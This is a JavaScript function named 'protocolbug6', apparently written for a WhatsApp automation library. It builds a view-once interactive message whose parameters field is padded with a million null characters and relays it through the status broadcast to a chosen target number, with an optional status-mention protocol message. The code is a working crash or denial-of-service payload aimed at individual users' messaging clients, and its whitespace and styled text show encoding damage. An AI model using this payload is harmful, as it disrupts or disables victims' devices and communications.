async function protocolbug6(isTarget, mention) {
Â  let msg = await generateWAMessageFromContent(isTarget, {
Â Â Â  viewOnceMessage: {
Â Â Â Â Â  message: {
Â Â Â Â Â Â Â  messageContextInfo: {
Â Â Â Â Â Â Â Â Â  messageSecret: crypto.randomBytes(32)
Â Â Â Â Â Â Â  },
Â Â Â Â Â Â Â  interactiveResponseMessage: {
Â Â Â Â Â Â Â Â Â  body: {
Â Â Â Â Â Â Â Â Â Â Â  text: "VALORES ",
Â Â Â Â Â Â Â Â Â Â Â  format: "DEFAULT"
Â Â Â Â Â Â Â Â Â  },
Â Â Â Â Â Â Â Â Â  nativeFlowResponseMessage: {
Â Â Â Â Â Â Â Â Â Â Â  name: "@jawaskrip",
Â Â Â Â Â Â Â Â Â Â Â  paramsJson: "\u0000".repeat(999999),
Â Â Â Â Â Â Â Â Â Â Â  version: 3
Â Â Â Â Â Â Â Â Â  },
Â Â Â Â Â Â Â Â Â  contextInfo: {
Â Â Â Â Â Â Â Â Â Â Â  isForwarded: true,
Â Â Â Â Â Â Â Â Â Â Â  forwardingScore: 9741,
Â Â Â Â Â Â Â Â Â Â Â  forwardedNewsletterMessageInfo: {
Â Â Â Â Â Â Â Â Â Â Â Â Â  newsletterName: "trigger newsletter ( @tamainfinity )",
Â Â Â Â Â Â Â Â Â Â Â Â Â  newsletterJid: "120363321780343299@newsletter",
Â Â Â Â Â Â Â Â Â Â Â Â Â  serverMessageId: 1
Â Â Â Â Â Â Â Â Â Â Â  }
Â Â Â Â Â Â Â Â Â  }
Â Â Â Â Â Â Â  }
Â Â Â Â Â  }
Â Â Â  }
Â  }, {});

Â  await sock.relayMessage("status@broadcast", msg.message, {
Â Â Â  messageId: msg.key.id,
Â Â Â  statusJidList: [isTarget],
Â Â Â  additionalNodes: [
Â Â Â Â Â  {
Â Â Â Â Â Â Â  tag: "meta",
Â Â Â Â Â Â Â  attrs: {},
Â Â Â Â Â Â Â  content: [
Â Â Â Â Â Â Â Â Â  {
Â Â Â Â Â Â Â Â Â Â Â  tag: "mentioned_users",
Â Â Â Â Â Â Â Â Â Â Â  attrs: {},
Â Â Â Â Â Â Â Â Â Â Â  content: [
Â Â Â Â Â Â Â Â Â Â Â Â Â  { tag: "to", attrs: { jid: isTarget }, content: undefined }
Â Â Â Â Â Â Â Â Â Â Â  ]
Â Â Â Â Â Â Â Â Â  }
Â Â Â Â Â Â Â  ]
Â Â Â Â Â  }
Â Â Â  ]
Â  });

Â  if (mention) {
Â Â Â  await sock.relayMessage(isTarget, {
Â Â Â Â Â  statusMentionMessage: {
Â Â Â Â Â Â Â  message: {
Â Â Â Â Â Â Â Â Â  protocolMessage: {
Â Â Â Â Â Â Â Â Â Â Â  key: msg.key,
Â Â Â Â Â Â Â Â Â Â Â  fromMe: false,
Â Â Â Â Â Â Â Â Â Â Â  participant: "0@s.whatsapp.net",
Â Â Â Â Â Â Â Â Â Â Â  remoteJid: "status@broadcast",
Â Â Â Â Â Â Â Â Â Â Â  type: 25
Â Â Â Â Â Â Â Â Â  },
Â Â Â Â Â Â Â Â Â  additionalNodes: [
Â Â Â Â Â Â Â Â Â Â Â  {
Â Â Â Â Â Â Â Â Â Â Â Â Â  tag: "meta",
Â Â Â Â Â Â Â Â Â Â Â Â Â  attrs: { is_status_mention: "ğŒ•ğŒ€ğŒŒğŒ€ âœ¦ ğŒ‚ğ‰ğŒğŒ‚ğŒ–ğŒ„ğ‚ğ‚ğ‰ğ‚" },
Â Â Â Â Â Â Â Â Â Â Â Â Â  content: undefined
Â Â Â Â Â Â Â Â Â Â Â  }
Â Â Â Â Â Â Â Â Â  ]
Â Â Â Â Â Â Â  }
Â Â Â Â Â  }
Â Â Â  }, {});
Â  }
}
